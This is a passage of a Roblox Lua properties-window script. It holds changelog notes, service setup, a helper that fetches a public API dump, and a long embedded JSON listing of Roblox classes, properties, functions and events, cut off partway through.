type Consolidated control methods and simplified them All input goes through ToValue method Fixed position of BrickColor palette Made DropDown appear above row if it would otherwise exceed the page height Cleaned up stylesheets 09/14 Made properties window scroll when mouse wheel scrolled Object/Instance and Color3 data types handled properly Multiple BrickColor controls interfering with each other fixed Added support for Content data type --]] wait(0.2) local print = function(s) print(tostring(s)) end -- Services local Teams = game:GetService("Teams") local Workspace = game:GetService("Workspace") local Debris = game:GetService("Debris") local ContentProvider = game:GetService("ContentProvider") local Players = game:GetService("Players") local ReplicatedStorage = game:GetService("ReplicatedStorage") -- Functions function httpGet(url) return game:HttpGet(url,true) end -- RbxApi Stuff local apiUrl = "http://anaminus.github.io/rbx/json/api/latest.json" local maxChunkSize = 100 * 1000 local ApiJson if script:FindFirstChild("RawApiJson") then ApiJson = script.RawApiJson else ApiJson = "" end function getLocalApiJson() local rawApiJson = [===[ [{"Superclass":null,"type":"Class","Name":"Instance","tags":["notbrowsable"]},{"ValueType":"bool","type":"Property","Name":"Archivable","tags":[],"Class":"Instance"},{"ValueType":"string","type":"Property","Name":"ClassName","tags":["readonly"],"Class":"Instance"},{"ValueType":"int","type":"Property","Name":"DataCost","tags":["RobloxPlaceSecurity","readonly"],"Class":"Instance"},{"ValueType":"string","type":"Property","Name":"Name","tags":[],"Class":"Instance"},{"ValueType":"Object","type":"Property","Name":"Parent","tags":[],"Class":"Instance"},{"ValueType":"bool","type":"Property","Name":"RobloxLocked","tags":["PluginSecurity"],"Class":"Instance"},{"ValueType":"bool","type":"Property","Name":"archivable","tags":["hidden"],"Class":"Instance"},{"ValueType":"string","type":"Property","Name":"className","tags":["deprecated","readonly"],"Class":"Instance"},{"ReturnType":"void","Arguments":[],"Name":"ClearAllChildren","tags":[],"Class":"Instance","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"Clone","tags":[],"Class":"Instance","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Destroy","tags":[],"Class":"Instance","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"name","Default":null},{"Type":"bool","Name":"recursive","Default":"false"}],"Name":"FindFirstChild","tags":[],"Class":"Instance","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"GetChildren","tags":[],"Class":"Instance","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"int","Name":"scopeLength","Default":"4"}],"Name":"GetDebugId","tags":["PluginSecurity","notbrowsable"],"Class":"Instance","type":"Function"},{"ReturnType":"string","Arguments":[],"Name":"GetFullName","tags":[],"Class":"Instance","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"className","Default":null}],"Name":"IsA","tags":[],"Class":"Instance","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Instance","Name":"descendant","Default":null}],"Name":"IsAncestorOf","tags":[],"Class":"Instance","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Instance","Name":"ancestor","Default":null}],"Name":"IsDescendantOf","tags":[],"Class":"Instance","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Remove","tags":["deprecated"],"Class":"Instance","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"children","tags":["deprecated"],"Class":"Instance","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"clone","tags":["deprecated"],"Class":"Instance","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"destroy","tags":["deprecated"],"Class":"Instance","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"name","Default":null},{"Type":"bool","Name":"recursive","Default":"false"}],"Name":"findFirstChild","tags":["deprecated"],"Class":"Instance","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"getChildren","tags":["deprecated"],"Class":"Instance","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"className","Default":null}],"Name":"isA","tags":["deprecated"],"Class":"Instance","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Instance","Name":"ancestor","Default":null}],"Name":"isDescendantOf","tags":["deprecated"],"Class":"Instance","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"remove","tags":["deprecated"],"Class":"Instance","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"childName","Default":null}],"Name":"WaitForChild","tags":[],"Class":"Instance","type":"YieldFunction"},{"Arguments":[{"Name":"child","Type":"Instance"},{"Name":"parent","Type":"Instance"}],"Name":"AncestryChanged","tags":[],"Class":"Instance","type":"Event"},{"Arguments":[{"Name":"property","Type":"Property"}],"Name":"Changed","tags":[],"Class":"Instance","type":"Event"},{"Arguments":[{"Name":"child","Type":"Instance"}],"Name":"ChildAdded","tags":[],"Class":"Instance","type":"Event"},{"Arguments":[{"Name":"child","Type":"Instance"}],"Name":"ChildRemoved","tags":[],"Class":"Instance","type":"Event"},{"Arguments":[{"Name":"descendant","Type":"Instance"}],"Name":"DescendantAdded","tags":[],"Class":"Instance","type":"Event"},{"Arguments":[{"Name":"descendant","Type":"Instance"}],"Name":"DescendantRemoving","tags":[],"Class":"Instance","type":"Event"},{"Arguments":[{"Name":"child","Type":"Instance"}],"Name":"childAdded","tags":["deprecated"],"Class":"Instance","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"Accoutrement","tags":[]},{"ValueType":"Vector3","type":"Property","Name":"AttachmentForward","tags":[],"Class":"Accoutrement"},{"ValueType":"CoordinateFrame","type":"Property","Name":"AttachmentPoint","tags":[],"Class":"Accoutrement"},{"ValueType":"Vector3","type":"Property","Name":"AttachmentPos","tags":[],"Class":"Accoutrement"},{"ValueType":"Vector3","type":"Property","Name":"AttachmentRight","tags":[],"Class":"Accoutrement"},{"ValueType":"Vector3","type":"Property","Name":"AttachmentUp","tags":[],"Class":"Accoutrement"},{"Superclass":"Accoutrement","type":"Class","Name":"Accessory","tags":[]},{"Superclass":"Accoutrement","type":"Class","Name":"Hat","tags":["deprecated"]},{"Superclass":"Instance","type":"Class","Name":"AdService","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[],"Name":"ShowVideoAd","tags":[],"Class":"AdService","type":"Function"},{"Arguments":[{"Name":"adShown","Type":"bool"}],"Name":"VideoAdClosed","tags":[],"Class":"AdService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"AdvancedDragger","tags":[]},{"Superclass":"Instance","type":"Class","Name":"Animation","tags":[]},{"ValueType":"Content","type":"Property","Name":"AnimationId","tags":[],"Class":"Animation"},{"Superclass":"Instance","type":"Class","Name":"AnimationController","tags":[]},{"ReturnType":"Array","Arguments":[],"Name":"GetPlayingAnimationTracks","tags":[],"Class":"AnimationController","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"Instance","Name":"animation","Default":null}],"Name":"LoadAnimation","tags":[],"Class":"AnimationController","type":"Function"},{"Arguments":[{"Name":"animationTrack","Type":"Instance"}],"Name":"AnimationPlayed","tags":[],"Class":"AnimationController","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"AnimationTrack","tags":[]},{"ValueType":"Object","type":"Property","Name":"Animation","tags":["readonly"],"Class":"AnimationTrack"},{"ValueType":"bool","type":"Property","Name":"IsPlaying","tags":["readonly"],"Class":"AnimationTrack"},{"ValueType":"float","type":"Property","Name":"Length","tags":["readonly"],"Class":"AnimationTrack"},{"ValueType":"AnimationPriority","type":"Property","Name":"Priority","tags":[],"Class":"AnimationTrack"},{"ValueType":"float","type":"Property","Name":"TimePosition","tags":[],"Class":"AnimationTrack"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"speed","Default":"1"}],"Name":"AdjustSpeed","tags":[],"Class":"AnimationTrack","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"weight","Default":"1"},{"Type":"float","Name":"fadeTime","Default":"0.100000001"}],"Name":"AdjustWeight","tags":[],"Class":"AnimationTrack","type":"Function"},{"ReturnType":"double","Arguments":[{"Type":"string","Name":"keyframeName","Default":null}],"Name":"GetTimeOfKeyframe","tags":[],"Class":"AnimationTrack","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"fadeTime","Default":"0.100000001"},{"Type":"float","Name":"weight","Default":"1"},{"Type":"float","Name":"speed","Default":"1"}],"Name":"Play","tags":[],"Class":"AnimationTrack","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"fadeTime","Default":"0.100000001"}],"Name":"Stop","tags":[],"Class":"AnimationTrack","type":"Function"},{"Arguments":[{"Name":"keyframeName","Type":"string"}],"Name":"KeyframeReached","tags":[],"Class":"AnimationTrack","type":"Event"},{"Arguments":[],"Name":"Stopped","tags":["deprecated"],"Class":"AnimationTrack","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"AnimationTrackState","tags":[]},{"Superclass":"Instance","type":"Class","Name":"Animator","tags":[]},{"ReturnType":"Instance","Arguments":[{"Type":"Instance","Name":"animation","Default":null}],"Name":"LoadAnimation","tags":[],"Class":"Animator","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"AssetService","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"revertUrl","Default":null}],"Name":"SetAssetRevertUrl","tags":["LocalUserSecurity"],"Class":"AssetService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"versionsUrl","Default":null}],"Name":"SetAssetVersionsUrl","tags":["LocalUserSecurity"],"Class":"AssetService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"accessUrl","Default":null}],"Name":"SetPlaceAccessUrl","tags":["LocalUserSecurity"],"Class":"AssetService","type":"Function"},{"ReturnType":"int","Arguments":[{"Type":"string","Name":"placeName","Default":null},{"Type":"int","Name":"templatePlaceID","Default":null},{"Type":"string","Name":"description","Default":""}],"Name":"CreatePlaceAsync","tags":[],"Class":"AssetService","type":"YieldFunction"},{"ReturnType":"int","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"string","Name":"placeName","Default":null},{"Type":"int","Name":"templatePlaceID","Default":null},{"Type":"string","Name":"description","Default":""}],"Name":"CreatePlaceInPlayerInventoryAsync","tags":[],"Class":"AssetService","type":"YieldFunction"},{"ReturnType":"Dictionary","Arguments":[{"Type":"int","Name":"placeId","Default":null},{"Type":"int","Name":"pageNum","Default":"1"}],"Name":"GetAssetVersions","tags":[],"Class":"AssetService","type":"YieldFunction"},{"ReturnType":"int","Arguments":[{"Type":"int","Name":"creationID","Default":null}],"Name":"GetCreatorAssetID","tags":[],"Class":"AssetService","type":"YieldFunction"},{"ReturnType":"Instance","Arguments":[],"Name":"GetGamePlacesAsync","tags":[],"Class":"AssetService","type":"YieldFunction"},{"ReturnType":"Dictionary","Arguments":[{"Type":"int","Name":"placeId","Default":null}],"Name":"GetPlacePermissions","tags":[],"Class":"AssetService","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"placeId","Default":null},{"Type":"int","Name":"versionNumber","Default":null}],"Name":"RevertAsset","tags":[],"Class":"AssetService","type":"YieldFunction"},{"ReturnType":"void","Arguments":[],"Name":"SavePlaceAsync","tags":[],"Class":"AssetService","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"placeId","Default":null},{"Type":"AccessType","Name":"accessType","Default":"Everyone"},{"Type":"Array","Name":"inviteList","Default":"{}"}],"Name":"SetPlacePermissions","tags":[],"Class":"AssetService","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"Attachment","tags":[]},{"ValueType":"Vector3","type":"Property","Name":"Axis","tags":[],"Class":"Attachment"},{"ValueType":"CoordinateFrame","type":"Property","Name":"CFrame","tags":[],"Class":"Attachment"},{"ValueType":"Vector3","type":"Property","Name":"Position","tags":[],"Class":"Attachment"},{"ValueType":"Vector3","type":"Property","Name":"Rotation","tags":[],"Class":"Attachment"},{"ValueType":"Vector3","type":"Property","Name":"SecondaryAxis","tags":[],"Class":"Attachment"},{"ValueType":"Vector3","type":"Property","Name":"WorldAxis","tags":["readonly"],"Class":"Attachment"},{"ValueType":"Vector3","type":"Property","Name":"WorldPosition","tags":["readonly"],"Class":"Attachment"},{"ValueType":"Vector3","type":"Property","Name":"WorldRotation","tags":["readonly"],"Class":"Attachment"},{"ValueType":"Vector3","type":"Property","Name":"WorldSecondaryAxis","tags":["readonly"],"Class":"Attachment"},{"ReturnType":"Vector3","Arguments":[],"Name":"GetAxis","tags":[],"Class":"Attachment","type":"Function"},{"ReturnType":"Vector3","Arguments":[],"Name":"GetSecondaryAxis","tags":[],"Class":"Attachment","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"axis","Default":null}],"Name":"SetAxis","tags":[],"Class":"Attachment","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"axis","Default":null}],"Name":"SetSecondaryAxis","tags":[],"Class":"Attachment","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"BadgeService","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetAwardBadgeUrl","tags":["LocalUserSecurity"],"Class":"BadgeService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"seconds","Default":null}],"Name":"SetHasBadgeCooldown","tags":["LocalUserSecurity"],"Class":"BadgeService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetHasBadgeUrl","tags":["LocalUserSecurity"],"Class":"BadgeService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetIsBadgeDisabledUrl","tags":["LocalUserSecurity"],"Class":"BadgeService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetIsBadgeLegalUrl","tags":["LocalUserSecurity"],"Class":"BadgeService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"placeId","Default":null}],"Name":"SetPlaceId","tags":["LocalUserSecurity"],"Class":"BadgeService","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"userId","Default":null},{"Type":"int","Name":"badgeId","Default":null}],"Name":"AwardBadge","tags":[],"Class":"BadgeService","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"badgeId","Default":null}],"Name":"IsDisabled","tags":[],"Class":"BadgeService","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"badgeId","Default":null}],"Name":"IsLegal","tags":[],"Class":"BadgeService","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"userId","Default":null},{"Type":"int","Name":"badgeId","Default":null}],"Name":"UserHasBadge","tags":[],"Class":"BadgeService","type":"YieldFunction"},{"Arguments":[{"Name":"message","Type":"string"},{"Name":"userId","Type":"int"},{"Name":"badgeId","Type":"int"}],"Name":"BadgeAwarded","tags":["RobloxScriptSecurity"],"Class":"BadgeService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"BasePlayerGui","tags":[]},{"Superclass":"BasePlayerGui","type":"Class","Name":"CoreGui","tags":["notCreatable","notbrowsable"]},{"ValueType":"Object","type":"Property","Name":"SelectionImageObject","tags":["RobloxScriptSecurity"],"Class":"CoreGui"},{"ValueType":"int","type":"Property","Name":"Version","tags":["readonly"],"Class":"CoreGui"},{"Superclass":"BasePlayerGui","type":"Class","Name":"PlayerGui","tags":["notCreatable"]},{"ValueType":"Object","type":"Property","Name":"SelectionImageObject","tags":[],"Class":"PlayerGui"},{"ReturnType":"float","Arguments":[],"Name":"GetTopbarTransparency","tags":[],"Class":"PlayerGui","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"transparency","Default":null}],"Name":"SetTopbarTransparency","tags":[],"Class":"PlayerGui","type":"Function"},{"Arguments":[{"Name":"transparency","Type":"float"}],"Name":"TopbarTransparencyChangedSignal","tags":[],"Class":"PlayerGui","type":"Event"},{"Superclass":"BasePlayerGui","type":"Class","Name":"StarterGui","tags":[]},{"ValueType":"bool","type":"Property","Name":"ResetPlayerGuiOnSpawn","tags":[],"Class":"StarterGui"},{"ValueType":"bool","type":"Property","Name":"ShowDevelopmentGui","tags":[],"Class":"StarterGui"},{"ReturnType":"bool","Arguments":[{"Type":"CoreGuiType","Name":"coreGuiType","Default":null}],"Name":"GetCoreGuiEnabled","tags":[],"Class":"StarterGui","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"parameterName","Default":null},{"Type":"Function","Name":"getFunction","Default":null}],"Name":"RegisterGetCore","tags":["RobloxScriptSecurity"],"Class":"StarterGui","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"parameterName","Default":null},{"Type":"Function","Name":"setFunction","Default":null}],"Name":"RegisterSetCore","tags":["RobloxScriptSecurity"],"Class":"StarterGui","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"parameterName","Default":null},{"Type":"Variant","Name":"value","Default":null}],"Name":"SetCore","tags":[],"Class":"StarterGui","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"CoreGuiType","Name":"coreGuiType","Default":null},{"Type":"bool","Name":"enabled","Default":null}],"Name":"SetCoreGuiEnabled","tags":[],"Class":"StarterGui","type":"Function"},{"ReturnType":"Variant","Arguments":[{"Type":"string","Name":"parameterName","Default":null}],"Name":"GetCore","tags":[],"Class":"StarterGui","type":"YieldFunction"},{"Arguments":[{"Name":"coreGuiType","Type":"CoreGuiType"},{"Name":"enabled","Type":"bool"}],"Name":"CoreGuiChangedSignal","tags":["RobloxScriptSecurity"],"Class":"StarterGui","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"BinaryStringValue","tags":[]},{"Superclass":"Instance","type":"Class","Name":"BindableEvent","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"Tuple","Name":"arguments","Default":null}],"Name":"Fire","tags":[],"Class":"BindableEvent","type":"Function"},{"Arguments":[{"Name":"arguments","Type":"Tuple"}],"Name":"Event","tags":[],"Class":"BindableEvent","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"BindableFunction","tags":[]},{"ReturnType":"Tuple","Arguments":[{"Type":"Tuple","Name":"arguments","Default":null}],"Name":"Invoke","tags":[],"Class":"BindableFunction","type":"YieldFunction"},{"ReturnType":"Tuple","Arguments":[{"Name":"arguments","Type":"Tuple"}],"Name":"OnInvoke","tags":[],"Class":"BindableFunction","type":"Callback"},{"Superclass":"Instance","type":"Class","Name":"BodyMover","tags":[]},{"Superclass":"BodyMover","type":"Class","Name":"BodyAngularVelocity","tags":[]},{"ValueType":"Vector3","type":"Property","Name":"AngularVelocity","tags":[],"Class":"BodyAngularVelocity"},{"ValueType":"Vector3","type":"Property","Name":"MaxTorque","tags":[],"Class":"BodyAngularVelocity"},{"ValueType":"float","type":"Property","Name":"P","tags":[],"Class":"BodyAngularVelocity"},{"ValueType":"Vector3","type":"Property","Name":"angularvelocity","tags":["deprecated"],"Class":"BodyAngularVelocity"},{"ValueType":"Vector3","type":"Property","Name":"maxTorque","tags":["deprecated"],"Class":"BodyAngularVelocity"},{"Superclass":"BodyMover","type":"Class","Name":"BodyForce","tags":[]},{"ValueType":"Vector3","type":"Property","Name":"Force","tags":[],"Class":"BodyForce"},{"ValueType":"Vector3","type":"Property","Name":"force","tags":["deprecated"],"Class":"BodyForce"},{"Superclass":"BodyMover","type":"Class","Name":"BodyGyro","tags":[]},{"ValueType":"CoordinateFrame","type":"Property","Name":"CFrame","tags":[],"Class":"BodyGyro"},{"ValueType":"float","type":"Property","Name":"D","tags":[],"Class":"BodyGyro"},{"ValueType":"Vector3","type":"Property","Name":"MaxTorque","tags":[],"Class":"BodyGyro"},{"ValueType":"float","type":"Property","Name":"P","tags":[],"Class":"BodyGyro"},{"ValueType":"CoordinateFrame","type":"Property","Name":"cframe","tags":["deprecated"],"Class":"BodyGyro"},{"ValueType":"Vector3","type":"Property","Name":"maxTorque","tags":["deprecated"],"Class":"BodyGyro"},{"Superclass":"BodyMover","type":"Class","Name":"BodyPosition","tags":[]},{"ValueType":"float","type":"Property","Name":"D","tags":[],"Class":"BodyPosition"},{"ValueType":"Vector3","type":"Property","Name":"MaxForce","tags":[],"Class":"BodyPosition"},{"ValueType":"float","type":"Property","Name":"P","tags":[],"Class":"BodyPosition"},{"ValueType":"Vector3","type":"Property","Name":"Position","tags":[],"Class":"BodyPosition"},{"ValueType":"Vector3","type":"Property","Name":"maxForce","tags":["deprecated"],"Class":"BodyPosition"},{"ValueType":"Vector3","type":"Property","Name":"position","tags":["deprecated"],"Class":"BodyPosition"},{"ReturnType":"Vector3","Arguments":[],"Name":"GetLastForce","tags":[],"Class":"BodyPosition","type":"Function"},{"ReturnType":"Vector3","Arguments":[],"Name":"lastForce","tags":["deprecated"],"Class":"BodyPosition","type":"Function"},{"Arguments":[],"Name":"ReachedTarget","tags":[],"Class":"BodyPosition","type":"Event"},{"Superclass":"BodyMover","type":"Class","Name":"BodyThrust","tags":[]},{"ValueType":"Vector3","type":"Property","Name":"Force","tags":[],"Class":"BodyThrust"},{"ValueType":"Vector3","type":"Property","Name":"Location","tags":[],"Class":"BodyThrust"},{"ValueType":"Vector3","type":"Property","Name":"force","tags":["deprecated"],"Class":"BodyThrust"},{"ValueType":"Vector3","type":"Property","Name":"location","tags":["deprecated"],"Class":"BodyThrust"},{"Superclass":"BodyMover","type":"Class","Name":"BodyVelocity","tags":[]},{"ValueType":"Vector3","type":"Property","Name":"MaxForce","tags":[],"Class":"BodyVelocity"},{"ValueType":"float","type":"Property","Name":"P","tags":[],"Class":"BodyVelocity"},{"ValueType":"Vector3","type":"Property","Name":"Velocity","tags":[],"Class":"BodyVelocity"},{"ValueType":"Vector3","type":"Property","Name":"maxForce","tags":["deprecated"],"Class":"BodyVelocity"},{"ValueType":"Vector3","type":"Property","Name":"velocity","tags":["deprecated"],"Class":"BodyVelocity"},{"ReturnType":"Vector3","Arguments":[],"Name":"GetLastForce","tags":[],"Class":"BodyVelocity","type":"Function"},{"ReturnType":"Vector3","Arguments":[],"Name":"lastForce","tags":[],"Class":"BodyVelocity","type":"Function"},{"Superclass":"BodyMover","type":"Class","Name":"RocketPropulsion","tags":[]},{"ValueType":"float","type":"Property","Name":"CartoonFactor","tags":[],"Class":"RocketPropulsion"},{"ValueType":"float","type":"Property","Name":"MaxSpeed","tags":[],"Class":"RocketPropulsion"},{"ValueType":"float","type":"Property","Name":"MaxThrust","tags":[],"Class":"RocketPropulsion"},{"ValueType":"Vector3","type":"Property","Name":"MaxTorque","tags":[],"Class":"RocketPropulsion"},{"ValueType":"Object","type":"Property","Name":"Target","tags":[],"Class":"RocketPropulsion"},{"ValueType":"Vector3","type":"Property","Name":"TargetOffset","tags":[],"Class":"RocketPropulsion"},{"ValueType":"float","type":"Property","Name":"TargetRadius","tags":[],"Class":"RocketPropulsion"},{"ValueType":"float","type":"Property","Name":"ThrustD","tags":[],"Class":"RocketPropulsion"},{"ValueType":"float","type":"Property","Name":"ThrustP","tags":[],"Class":"RocketPropulsion"},{"ValueType":"float","type":"Property","Name":"TurnD","tags":[],"Class":"RocketPropulsion"},{"ValueType":"float","type":"Property","Name":"TurnP","tags":[],"Class":"RocketPropulsion"},{"ReturnType":"void","Arguments":[],"Name":"Abort","tags":[],"Class":"RocketPropulsion","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Fire","tags":[],"Class":"RocketPropulsion","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"fire","tags":["deprecated"],"Class":"RocketPropulsion","type":"Function"},{"Arguments":[],"Name":"ReachedTarget","tags":[],"Class":"RocketPropulsion","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"BoolValue","tags":[]},{"ValueType":"bool","type":"Property","Name":"Value","tags":[],"Class":"BoolValue"},{"Arguments":[{"Name":"value","Type":"bool"}],"Name":"Changed","tags":[],"Class":"BoolValue","type":"Event"},{"Arguments":[{"Name":"value","Type":"bool"}],"Name":"changed","tags":["deprecated"],"Class":"BoolValue","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"BrickColorValue","tags":[]},{"ValueType":"BrickColor","type":"Property","Name":"Value","tags":[],"Class":"BrickColorValue"},{"Arguments":[{"Name":"value","Type":"BrickColor"}],"Name":"Changed","tags":[],"Class":"BrickColorValue","type":"Event"},{"Arguments":[{"Name":"value","Type":"BrickColor"}],"Name":"changed","tags":["deprecated"],"Class":"BrickColorValue","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"Button","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"active","Default":null}],"Name":"SetActive","tags":["PluginSecurity"],"Class":"Button","type":"Function"},{"Arguments":[],"Name":"Click","tags":["PluginSecurity"],"Class":"Button","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"CFrameValue","tags":[]},{"ValueType":"CoordinateFrame","type":"Property","Name":"Value","tags":[],"Class":"CFrameValue"},{"Arguments":[{"Name":"value","Type":"CoordinateFrame"}],"Name":"Changed","tags":[],"Class":"CFrameValue","type":"Event"},{"Arguments":[{"Name":"value","Type":"CoordinateFrame"}],"Name":"changed","tags":["deprecated"],"Class":"CFrameValue","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"CacheableContentProvider","tags":[]},{"Superclass":"CacheableContentProvider","type":"Class","Name":"MeshContentProvider","tags":[]},{"Superclass":"CacheableContentProvider","type":"Class","Name":"SolidModelContentProvider","tags":[]},{"Superclass":"CacheableContentProvider","type":"Class","Name":"TextureContentProvider","tags":[]},{"Superclass":"Instance","type":"Class","Name":"Camera","tags":[]},{"ValueType":"CoordinateFrame","type":"Property","Name":"CFrame","tags":[],"Class":"Camera"},{"ValueType":"Object","type":"Property","Name":"CameraSubject","tags":[],"Class":"Camera"},{"ValueType":"CameraType","type":"Property","Name":"CameraType","tags":[],"Class":"Camera"},{"ValueType":"CoordinateFrame","type":"Property","Name":"CoordinateFrame","tags":["deprecated","hidden"],"Class":"Camera"},{"ValueType":"float","type":"Property","Name":"FieldOfView","tags":[],"Class":"Camera"},{"ValueType":"CoordinateFrame","type":"Property","Name":"Focus","tags":[],"Class":"Camera"},{"ValueType":"bool","type":"Property","Name":"HeadLocked","tags":[],"Class":"Camera"},{"ValueType":"float","type":"Property","Name":"HeadScale","tags":[],"Class":"Camera"},{"ValueType":"Vector2","type":"Property","Name":"ViewportSize","tags":["readonly"],"Class":"Camera"},{"ValueType":"CoordinateFrame","type":"Property","Name":"focus","tags":["deprecated"],"Class":"Camera"},{"ReturnType":"float","Arguments":[],"Name":"GetPanSpeed","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"CoordinateFrame","Arguments":[],"Name":"GetRenderCFrame","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"float","Arguments":[],"Name":"GetRoll","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"float","Arguments":[],"Name":"GetTiltSpeed","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"CoordinateFrame","Name":"endPos","Default":null},{"Type":"CoordinateFrame","Name":"endFocus","Default":null},{"Type":"float","Name":"duration","Default":null}],"Name":"Interpolate","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"units","Default":null}],"Name":"PanUnits","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"Ray","Arguments":[{"Type":"float","Name":"x","Default":null},{"Type":"float","Name":"y","Default":null},{"Type":"float","Name":"depth","Default":"0"}],"Name":"ScreenPointToRay","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"CameraPanMode","Name":"mode","Default":"Classic"}],"Name":"SetCameraPanMode","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"rollAngle","Default":null}],"Name":"SetRoll","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"units","Default":null}],"Name":"TiltUnits","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"Ray","Arguments":[{"Type":"float","Name":"x","Default":null},{"Type":"float","Name":"y","Default":null},{"Type":"float","Name":"depth","Default":"0"}],"Name":"ViewportPointToRay","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"Vector3","Name":"worldPoint","Default":null}],"Name":"WorldToScreenPoint","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"Vector3","Name":"worldPoint","Default":null}],"Name":"WorldToViewportPoint","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"float","Name":"distance","Default":null}],"Name":"Zoom","tags":["RobloxScriptSecurity"],"Class":"Camera","type":"Function"},{"Arguments":[{"Name":"entering","Type":"bool"}],"Name":"FirstPersonTransition","tags":["RobloxPlaceSecurity"],"Class":"Camera","type":"Event"},{"Arguments":[],"Name":"InterpolationFinished","tags":[],"Class":"Camera","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"ChangeHistoryService","tags":["notCreatable"]},{"ReturnType":"Tuple","Arguments":[],"Name":"GetCanRedo","tags":["PluginSecurity"],"Class":"ChangeHistoryService","type":"Function"},{"ReturnType":"Tuple","Arguments":[],"Name":"GetCanUndo","tags":["PluginSecurity"],"Class":"ChangeHistoryService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Redo","tags":["PluginSecurity"],"Class":"ChangeHistoryService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ResetWaypoints","tags":["PluginSecurity"],"Class":"ChangeHistoryService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"state","Default":null}],"Name":"SetEnabled","tags":["PluginSecurity"],"Class":"ChangeHistoryService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"name","Default":null}],"Name":"SetWaypoint","tags":["PluginSecurity"],"Class":"ChangeHistoryService","type":"Function"},{"ReturnType":"v